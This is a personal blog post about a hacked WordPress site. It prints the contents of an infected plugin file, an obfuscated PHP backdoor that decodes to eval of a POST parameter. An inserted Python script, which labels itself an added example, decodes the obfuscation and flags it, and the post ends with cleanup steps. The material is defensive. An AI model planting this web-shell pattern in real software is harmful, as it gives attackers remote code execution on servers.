I might not update much anymore, but I still want the blog to remain as a record of my travels. This afternoon I got an email from 1and1, my webhost, telling me that the following file was “under attack” –

~/blog/wp-content/plugins/health-check/code.php

I was surprised, and immediately went into my SFTP client to download and check the file. It was an old plugin, I must have installed it as part of the PHP4 -> 5 changeover I did sometime while I was in Jordan to see what version was being reported. Tellingly, the plugin had never been updated, and I can’t seem to find it anymore in WordPress’s extension/plugin repository (although maybe this is it, as it’s named health-check in their database).

More chillingly, viewing the website in a browser yielded an error pertaining to my wp-includes folder, a settings file, that was no longer functioning. White screen; that’s it.

When I tried to download code.php to my computer to inspect it, Windows Defender immediately flagged the file as malware and deleted it. Since I was on my work machine at the time, I had to talk to my colleague next door (who runs our antivirus scanner) to unblock the file! It was gobbledegook anyway – here’s what was inside it:

<?php /* the file had a long run of spaces here, pushing the code off-screen in an editor */
$scol4 = "t_psroue";
$fcen0 = $scol4[3].$scol4[0].$scol4[4].$scol4[0].$scol4[5].$scol4[6].$scol4[2].$scol4[2].$scol4[7].$scol4[4]; // spells "strtoupper"
$jphf86 = $fcen0($scol4[1].$scol4[2].$scol4[5].$scol4[3].$scol4[0]); // strtoupper("_post") = "_POST"
if (isset(${$jphf86}['qd6e706'])) { eval(${$jphf86}['qd6e706']); } // i.e. eval($_POST['qd6e706'])
?>
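To see what that gobbledegook actually does, here is a small triage script (an added example, my own code, not from the post or from WordPress) that statically resolves the character-index trick and flags the eval sink; the sample strings are constructed from the snippet above, with the whitespace run shortened, and the function names are my own.

```python
import re

# Constructed sample of the code.php contents quoted above (smart quotes replaced by
# plain ASCII, the long run of spaces after "<?php" shortened); not the live file.
BACKDOOR = "<?php" + " " * 60 + (
    '$scol4 ="t_psroue" ; '
    '$fcen0= $scol4[3]. $scol4[0].$scol4[4]. $scol4[0].$scol4[5].$scol4[6].'
    ' $scol4[2]. $scol4[2].$scol4[7]. $scol4[4]; '
    '$jphf86 =$fcen0 ( $scol4[1].$scol4[2].$scol4[5].$scol4[3]. $scol4[0] ) ; '
    "if ( isset( ${ $jphf86 }['qd6e706' ]) ) { eval ( ${ $jphf86}[ 'qd6e706']); }?>"
)
# Constructed benign plugin snippet for comparison.
BENIGN = "<?php\nfunction health_check_version() { return phpversion(); }\n"

CHAIN = r'(?:\$\w+\[\d+\]\s*\.?\s*)+'      # a $s[3].$s[0]. ... concatenation chain
STRING_FUNCS = {"strtoupper": str.upper, "strtolower": str.lower, "strrev": lambda s: s[::-1]}

def decode_index_strings(src):
    """Rebuild names assembled one character at a time from a string literal, then
    apply a known string function called through a variable ($f = $s[..]; $f(...)).
    Returns {variable: resolved string}."""
    names = {m[1]: m[2] for m in re.finditer(r'\$(\w+)\s*=\s*["\']([^"\']*)["\']', src)}

    def chain_value(chain):
        return "".join(names.get(v, "")[int(i):int(i) + 1]
                       for v, i in re.findall(r'\$(\w+)\[(\d+)\]', chain))

    for m in re.finditer(r'\$(\w+)\s*=\s*(' + CHAIN + r');', src):            # $x = chain;
        names[m[1]] = chain_value(m[2])
    for m in re.finditer(r'\$(\w+)\s*=\s*\$(\w+)\s*\(\s*(' + CHAIN + r')\)', src):  # $y = $x(chain)
        names[m[1]] = STRING_FUNCS.get(names.get(m[2], ""), lambda s: s)(chain_value(m[3]))
    return names

def triage(src):
    """Findings for one PHP file: off-screen padding after the open tag, and an
    eval() fed through a variable-variable (${$x}[...]) with $x resolved."""
    findings = {}
    if re.match(r'<\?php[ \t]{40,}', src):
        findings["padded_open_tag"] = True
    names = decode_index_strings(src)
    m = re.search(r'eval\s*\(\s*\$\{\s*\$(\w+)\s*\}\s*\[\s*["\'](\w+)["\']', src)
    if m:
        findings["eval_source"] = (names.get(m[1], "?"), m[2])   # e.g. ("_POST", "qd6e706")
    return findings

if __name__ == "__main__":
    for label, src in (("code.php sample", BACKDOOR), ("benign plugin", BENIGN)):
        print(label, "->", triage(src) or "nothing suspicious")
```

The resolved names show the whole file reduces to eval($_POST['qd6e706']): anyone who knows the parameter name can run arbitrary PHP on the host with a single request, which is why replacing the core folders (and removing the plugin) was the right call.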

Anyway, using this thread here, the easy fix was just to entirely purge the wp-admin and wp-includes folders and replace them with fresh downloads from wordpress.org. Once I did that, everything started working again. But it was quite a scare, especially since I cheaped out with 1and1 last year when they begged me to upgrade from my $4 a month hosting to something with backup capability. I run my own backups…sometimes. Heh. Guess I should do that now.

Update, June 6th – Found it. I’m almost positive that this was the cause of the infection, as today I was notified of flaws in the WP-Mobile-Detector plugin. I applied the patch right away, although weirdly enough it still shows the “last modified” date for the resize.php file as being February 2016, not June.